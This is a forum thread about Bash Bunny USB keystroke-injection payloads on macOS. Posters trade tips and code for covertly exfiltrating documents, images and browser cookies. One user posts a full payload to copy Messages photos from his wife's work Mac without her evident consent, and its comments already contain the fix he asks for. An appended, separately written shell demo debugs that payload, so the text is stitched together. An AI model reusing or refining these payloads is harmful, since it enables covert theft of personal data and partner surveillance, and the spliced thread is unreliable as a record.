WiFiJuice, September 3, 2017:
Guys, what Bash Bunny payloads have you had any success with on OS X?
Firestorm, September 3, 2017 (edited September 5, 2017):
No. What is your problem with your Bash Bunny?
Opticon, September 5, 2017:
@WiFiJuice I've been at this for a long time, as I bought the BB when it was first released. However, the following payloads never worked for me, and I was constantly looking for feedback over at Github: MacReverseShell, MacGetUsers, MacPFDExfil, etc. However, the one that has worked, and is easily modifiable to grab files from multiple directories, is macinfograbber. Great payload and I tip my hat to @kmakblob for this. Any other questions, please feel free to hit me up anytime :-)
couchTornado, September 7, 2017:
Granted, this was my first attempt at running a payload from the BB on Mac OSX, but even after choosing the correct ethernet device, the nmap payload failed because OSX requires root to run the OS fingerprinting functions. NMAP has been this way for a long time (even prior to the security upgrades introduced a couple of versions ago). Working at an art school, we run MacOS everywhere (80-90% of our machines across academic and administrative units). I'll keep poking at it, but if anyone has an easy fix, I'm all ears.
WiFiJuice (author), September 7, 2017:
Awesome work with the Macinfograbber :) Thanks @Opticon. Hope we will have more Mac OS X payloads working on the BB soon. It has a huge percentage of the operating system market share: http://gs.statcounter.com/os-market-share/all/united-states-of-america
Opticon, September 7, 2017:
Thank you @WiFiJuice. Macinfograbber, after altering code parameters, will fetch any document you'd like. I have mine set to go to the Desktop, Documents, and Home directories, and exfiltrate DOC, DOCX, PDF, PNG, JPG, JPEG, MOV, XLS, XLSX and more! I've tested the rewrite on several Macs and don't you know, it works on them all!

However, @couchTornado has a valid point regarding NMAP and OSX. I'll start to work on something and share my results either here or on Github. Just a thought before I log off, but if NMAP can't be used, what if we just call upon something inherent to Terminal? Such as:

Scan the available wireless networks:
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s

Set up a network listener on port 2196 for testing:
/usr/bin/nc -l 2196

Capture some packets:
tcpdump -nS

Capture all the packets:
tcpdump -nnvvXS

Capture the packets for a given port:
tcpdump -nnvvXS port 548

These are just a couple of things to consider while I toil away with a proper OSX NMAP hack. Cheers!
WiFiJuice (author), September 7, 2017:
@Opticon do you mind sharing your payload? Mine didn't work... I have a Swedish keyboard, so I used "QUACK SET_LANGUAGE se" at the top, but it didn't do the trick...
Opticon, September 7, 2017:
@WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone!
WiFiJuice (author), September 7, 2017:
> Opticon said: @WiFiJuice Not at all! Would you like me to post the code publicly, on this forum, Github etc...? Let me just go ahead and do all of the aforementioned, that way I'm not keeping secrets from anyone!

@Opticon just sent you a DM :)
Opticon, September 7, 2017:
@WiFiJuice The DM has been sent and I hope you enjoy it! Let me know if there's anything you would add or subtract from the payload. Cheers!
Opticon, September 7, 2017:
For reasons unknown to myself, MacOS or OSX has been greatly overlooked where the Bash Bunny is concerned. Having extensive knowledge of the architecture to make an actual Mac exfiltration possible led me to this script. Previous deprecated versions of the original may exist; however, they were myopic in scope and failed upon execution. Allow me to introduce Mac Master Exfil, or MME 1.0, which I hope will guide other Mac enthusiasts to add to this project. It is currently pending approval at Github. DM me for the code. Thank you all :-)
Opticon, September 8, 2017:
Well @WiFiJuice, I'll get working on it. However, here's a pertinent question: what firmware are you currently using? I've found 1.2 to be the most reliable firmware for the Bash Bunny. I've had nothing but trouble with 1.3: restores and switches that won't execute payloads, etc. What are your thoughts? I invite the entire community @couchTornado @Firestorm @Sebkinne @Darren Kitchen et al. to answer. -Cheers
Dave-ee Jones, September 8, 2017:
Please don't tag everyone like that; if they deem it important enough, they will give their answer (Sebkinne answers if no one else has, or if he wants to add to something or if he wants to confirm something, but Darren rarely does). Not to mention you left me out ... :( I myself have had no problems with firmware 1.3, and most of the payload library works with 1.3, therefore not working with 1.2 very well. Not sure why you would be getting weird switch errors..
Sebkinne, September 8, 2017:
Use 1.3
WiFiJuice (author), September 8, 2017:
How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows:

QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
PoSHMagiC0de, September 8, 2017:
> WiFiJuice said: How can I make something like this without Powershell? I want it to print out commands from a .txt file or similar saved on the Bash Bunny, but in OS X instead of Windows:
> QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"

Use python. I do not have the code off the top of my head right now, but when I get around to it (too much at work right now and part of too many projects) I plan on making the BBTPS cross-platform, with the OSX and Linux agent parts being done in python. The issue with the above is that I know on Linux you need to be root or using sudo to mount a removable drive. That is the reason I chose the network approach for the BBTPS, so I do not have to worry about mounting anything on the victim.
WiFiJuice (author), September 8, 2017:
The Swedish language file is wrong, @Sebkinne. For example, it can't write out a "~" correctly and messes up my code... How can this be fixed?
Opticon, September 8, 2017:
@WiFiJuice You bring up an excellent point, one that I would have wished the developers had anticipated. Hopefully, as you've addressed this problem before, they will look into resolving the language files. Perhaps it's the reason my payload didn't work for you, but that's only speculation.
RazerBlade, September 8, 2017:
> WiFiJuice said: The Swedish language file is wrong, @Sebkinne. For example, it can't write out a "~" correctly and messes up my code... How can this be fixed?

I'm also using the Swedish keyboard layout. In my experience the language file works great on Windows, but as you said, it spells out the character wrong.
RazerBlade, September 8, 2017:
It appears that to type ~ on Mac with the Swedish Pro layout, which most Swedish users do, it's alt + ¨, which the Mac interprets as ~. So the keyboard file has to be changed.
WiFiJuice (author), September 8, 2017:
> RazerBlade said: It appears that to type ~ on Mac with the Swedish Pro layout, which most Swedish users do, it's alt + ¨, which the Mac interprets as ~. So the keyboard file has to be changed.

Yes, that little character is really important to be able to write out something like "~/Library/Application\\ Support/Google/Chrome/Default/Cookies"
WiFiJuice (author), September 10, 2017:
This is the layout of the Swedish Pro Keyboard. The se.json file in https://github.com/hak5/bashbunny-payloads/tree/master/languages is corrupt. It can't write out the very important tilde sign " ~ ", nor can it write out a backslash " \ ". Can anyone please help out to fix this issue? I will donate $50 in BTC to the one that fixes this, as I really need my BB to work.
ldopanda, September 13, 2017:
I am actually working on an OSX-specific keyboard layout. At the moment, to resolve the keyboard issue on OSX, switch to the PC layout in the keyboard settings.
ImInAjar, January 4, 2019:
@Opticon do you have a git repository with some of your modifications? I'm working on modifying InfoGrabber to retrieve pictures sent via text from my wife's Mac before she has to return it to work, but I can't get the following to work:

QUACK STRING find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;

The script dies at this line with the output:

find: -exec: no terminating ";" or "+"

I can't find any documentation on what may be happening. Any help would be great.
ImInAjar, January 4, 2019:
Full script:

#!/bin/bash
# Bash Bunny payload: copy Messages attachments from the Mac into the Bunny's loot directory
LED G R
ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
lootdir=loot/MacLoot
mkdir -p /root/udisk/$lootdir
# Open Terminal through Spotlight
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 5000
QUACK STRING "mkdir -p /Volumes/BashBunny/$lootdir/images"
QUACK ENTER
QUACK DELAY 500
# The whole command is double-quoted so the Bunny's own bash neither expands "~"
# to the Bunny's home directory nor strips the backslash from "\;" (an unquoted
# "\;" reached the Mac as a bare ";", which ended the command early and produced
# the "-exec: no terminating ;" error). The parentheses are needed because -o
# binds weaker than the implied -a, otherwise only the .png branch gets copied.
QUACK STRING "find ~/Library/Messages/Attachments/ \( -iname '*.jpeg' -o -iname '*.png' \) -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;"
QUACK ENTER
# Give the Mac time to finish copying before checking the results
QUACK DELAY 10000
# Sync filesystem
sync
# Green LED for finished
LED G
# Count the images on the Bunny's side of the storage
files=$(ls /root/udisk/$lootdir/images/{*.jpg,*.jpeg,*.png} 2> /dev/null | wc -l)
if [ "$files" != "0" ]; then
    LED R B # Got image files
else
    LED R   # No image files
fi
# Eject BB: typed into the Mac's Terminal as one line (an unquoted ";" here would
# split the line so that killall ran on the Bunny instead of the Mac)
QUACK STRING "diskutil unmount BashBunny; killall Terminal"
QUACK ENTER
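The two defects in that find line reproduced stand-alone, as an added example written here and not taken from the thread or from InfoGrabber. It runs on any POSIX sh (not on the Bunny); quack_string stands in for the Bunny's QUACK STRING, and the attachment file names are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): why the posted find line fails, and the fixed form.
# quack_string stands in for the Bunny's QUACK STRING: it returns the text that bash
# hands to QUACK, which is exactly what gets typed into the Mac's Terminal.
set -e
lootdir=loot/MacLoot

quack_string() { printf '%s\n' "$*"; }

# As posted: bash on the Bunny tilde-expands ~ to the Bunny's own home directory and
# turns \; into a bare ;, so the Mac's shell ends the command there and find reports
# "-exec: no terminating ; or +".
typed_as_posted() {
    quack_string find ~/Library/Messages/Attachments/ -iname "*.jpeg" -o -iname "*.png" -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;
}

# Fixed: double-quote the whole command. ~, \( \) and \; reach the Mac intact while
# $lootdir still expands on the Bunny.
typed_fixed() {
    quack_string "find ~/Library/Messages/Attachments/ \( -iname '*.jpeg' -o -iname '*.png' \) -type f -exec cp {} /Volumes/BashBunny/$lootdir/images/ \;"
}

# Second defect: without parentheses -o binds weaker than the implied -a, so -type
# and -exec only apply to the .png branch and .jpeg files are never copied. Runs
# find for real over a constructed directory and returns how many files were copied.
copied_count() {
    tmp=$(mktemp -d)
    mkdir "$tmp/src" "$tmp/dst"
    : > "$tmp/src/a.jpeg"; : > "$tmp/src/b.png"; : > "$tmp/src/c.txt"
    if [ "$1" = posted ]; then
        find "$tmp/src" -iname '*.jpeg' -o -iname '*.png' -type f -exec cp {} "$tmp/dst/" \;
    else
        find "$tmp/src" \( -iname '*.jpeg' -o -iname '*.png' \) -type f -exec cp {} "$tmp/dst/" \;
    fi
    ls "$tmp/dst" | wc -l | tr -d ' '
    rm -rf "$tmp"
}

echo "typed as posted:  $(typed_as_posted)"
echo "typed fixed:      $(typed_fixed)"
echo "copied as posted: $(copied_count posted), copied fixed: $(copied_count fixed)"
```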